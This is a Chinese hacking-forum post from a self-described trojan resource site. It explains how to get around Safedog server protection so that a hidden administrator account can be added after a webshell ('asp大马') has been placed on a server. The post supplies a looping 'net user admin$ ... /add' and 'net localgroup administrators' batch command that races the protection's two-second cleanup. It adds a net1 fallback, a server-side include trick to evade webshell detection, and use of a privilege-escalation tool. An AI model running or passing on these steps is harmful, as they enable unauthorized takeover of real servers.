安全狗拦截添加账户存在绕过漏洞 - 中国木马资源网

作者:admin2016-1-21 0:19分类: 黑客技术,黑客渗透网站文章 标签: 绕过安全狗提权

安全狗拦截添加服务器账户,简单突破,直接在命令行下使用!

for /l %i in (1,1,1000) do @net user admin$ aspdama /add&@net localgroup administrators test /add

另存为 aspdama.bat 使用:for /l %%i in (1,1,1000) do @net user admin$ aspdama /add&@net localgroup administrators test /add

asp大马提权文件.jpg

命令的意思是循环一千次执行do后面的命令add user,要说一下安全狗拦截添加用户的原理。

老版本安全狗的拦截并不是真正意义上的拦截,而是每2秒钟检测一次是否有新添加的用户,如果有新用户,则删除。

所以我们直接net user admin$ aspdama /add 是能够成功添加用户的,只不过两秒后被安全狗删除了而已。

上面的命令是不断的重复加用户的操作,直到1000次,大概两分钟就会执行完毕自动退出{远程登录test后,无论test是否已经被删除,都不会受到影响},如果需要无限循环,将括号内的数字改为(1,0,1)即可,然后记得要手动停止!

新版本安全狗直接禁用net 不过net1还是可以调用 所以直接net1 user xxx xxx 可以顺利执行。
提权服务器.jpg

新版本安全狗禁用了net、net1照样可以执行命令。

asp大马执行cmd.jpg

asp大马执行cmd命令.jpg

服务器安全狗拦截.jpg

asp大马cmd添加用户.jpg

提权pr.exe文件.jpg

老版本先用<!--#include file="xxx.xxx"--> 跳转方法过安全狗webshell拦截!

利用exp提升权限,但是无法添加用户,用系统权限执行for /l %i in (1,1,1000) do @net user admin$ aspdama /add&@net localgroup administrators test /add 

只要在安全狗删除的2秒前登陆,之后账号被删了也没关系。
net user.jpg

成功绕过安全狗添加用户.jpg

远程连接服务器.jpg

Administrator.jpg

拦截系统账号.jpg

登陆成功以后,看账户是没有的,因为已经被删了,但是登陆以后就是我们说了算了!

来源:asp大马官网 转载注明出处!

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/1536 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~